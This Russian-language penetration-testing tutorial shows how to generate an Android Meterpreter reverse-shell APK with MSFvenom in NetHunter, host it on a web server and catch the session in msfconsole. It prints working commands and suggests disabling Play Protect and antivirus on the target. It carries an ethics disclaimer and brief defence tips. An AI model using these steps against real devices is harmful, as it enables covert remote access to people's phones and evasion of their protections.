Metasploit — фреймворк, который позволяет создавать, тестировать и выполнять эксплойты и полезные нагрузки для различных систем и платформ (см. Как пользоваться Metasploit). Для создания полезной нагрузки на Android можно использовать инструмент NetHunter Metasploit Payload Generator, который задействует MSFvenom. В статье расскажу об особенностях и преимуществах этого инструмента, а также покажу, как создать и доставить полезную нагрузку на Android-смартфон.
Еще по теме: Пример использования Metasploit
Создание пейлоада в Metasploit NetHunter
MSFvenom Payload Creator (MFSPC) был написан для упрощения процесса создания полезных нагрузок. При создании пейлоада можно выбрать тип операционной системы, архитектуру, формат подключения и выходной формат в зависимости от целевой системы. О самом MSFvenom мы рассказывали в статье «Как использовать MSFVenom».
Полезная нагрузка (payload, пейлоад) в контексте пентеста — это код, который запускается на целевой системе. Пейлоад может выполнять различные действия, такие как получение удаленного доступа к системе, выполнение команд, загрузка или скачивание файлов.
Интерфейс простой и позволяет выбрать тип полезной нагрузки для целевой системы, указать порт и IP-адрес для прослушивания, а также задать другие параметры.
Можно выбрать 13 типов пейлоада: ASP, ASPX, Bash, Java, Linux ELF, macOS Mach-O, Perl, PHP, PowerShell, Python, Tomcat WAR, Windows EXE/DLL и Android APK.
По умолчанию порт установлен на 443, а IP — это ваш локальный IP Android-устройства. Для использования внешнего IP потребуется предварительно настроить туннелирование порта, например, через ngrok (см. Установка Ngrok). В данном примере я буду использовать локальный айпишник.
Можно выбрать тип подключения: Reverse (обратное подключение) или Bind (открытие порта на целевом устройстве). Обратное подключение — предпочтительный способ, так как целевое устройство само подключается к вашему открытому порту (так называемый бэкконнект).
Все методы описанные в данной статье, предназначены для обучения пентестеров (этичных хакеров). Использование данных техник для атак на частные лица или организации без их предварительного согласия является незаконным. Ни редакция spy-soft.net, ни автор не несут ответственности за ваши незаконные действия.
Полезные нагрузки бывают двух типов: Staged (разделенная) и Stageless (самодостаточная). Разделенная полезная нагрузка меньше по размеру, но зависит от Metasploit, а самодостаточная — полностью автономна.
Можно выбрать один из протоколов: TCP, HTTP, HTTPS или Find Port. TCP — это стандартное подключение, HTTP и HTTPS полезны для обхода ограничений межсетевых экранов, а Find Port ищет доступные порты на целевом устройстве.
В нижней части можно выбрать место сохранения сгенерированной полезной нагрузки: либо на внешнее хранилище устройства (SD-карту), либо в директорию веб-сервера ( /var/www/html).
1 |
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.194 LPORT=443 R > /sdcard/android_payload.apk |
Вывод командной строки для GENERATE TO HTTP очень похож на GENERATE TO SDCARD, за исключением того, что полезная нагрузка и скрипт генерируются в корне веб-сервера ( /var/www/html).
Как только полезная нагрузка будет создана, генерируется и скрипт MSF handler с расширением .rc, который содержит все необходимые команды для автоматического запуска полезной нагрузки.
Создание нагрузки Android HTTP
Попробуем создать полезную нагрузку для Android и запустить на целевом устройстве. Сначала нужно выбрать тип Android [.apk] и использовать IP-адрес устройства и порт по умолчанию. Затем нужно нажать GENERATE TO HTTP и дождаться завершения.
Теперь запустим консоль Metasploit с помощью сгенерированного скрипта:
1 |
msfconsole -q -r android-meterpreter-staged-reverse-tcp-443-apk.rc |
После запуска создаем веб-сервер для доставки APK-файла на целевое устройство. Есть два способа — использовать:
- Python
- Apache2
Для Python необходимо сменить директорию на /var/www/html и запустить:
1 |
python2 -m SimpleHTTPServer 80 |
Если все настроено правильно, можно скачать APK-файл на целевом устройстве, перейдя по адресу:
1 |
http://192.168.0.194/android-meterpreter-staged-reverse-tcp-443.apk |
Второй способ — запустить сервис Apache2 в NetHunter, после чего полезную нагрузку также можно скачать по указанному выше ссылке.
После скачивания APK на целевом устройстве его нужно установить, разрешив установку приложений из неизвестных источников. Если на устройстве включена опция Google Play Protect или установлено антивирусное ПО, их стоит временно отключить, чтобы пейлоад не был заблокирован.
Если все прошло успешно, мы получим доступ к устройству через открывшуюся сессию Meterpreter.
Metasploit — незаменимый инструмент для тех, кто занимается этичным хакингом. Он позволяет создать пейлоад для различных целей и использовать его для удаленного доступа к целевому устройству или выполнения команд.
Установка Metasploit в Termux
Если у вас не установлен NetHunter, но вы хотите поэкспериментировать с Metasploit, можно его установить в Termux на не рутованное устройство Android.
Сочетание Nmap и Metasploit
Сочетание Nmap и Metasploit может значительно улучшить результат оценки сети. Nmap помогает собрать информацию о целевой системе, а Metasploit предоставляет инструменты для эксплуатации выявленных уязвимостей. Однако важно помнить о риске ложных срабатываний, поэтому всегда проверяем результаты вручную!
Защита от подобных атак
Поддерживайте актуальность систем и приложений. Скачивайте и устанавливайте приложения только из официальных источников (магазинов) и не запускайте файлы полученные от «добрых» друзей и незнакомцев. И обязательно фильтруйте подозрительный трафик, как это делать мы рассказывали в статье «Защита телефона Андроид от слежки».
ПОЛЕЗНЫЕ ССЫЛКИ: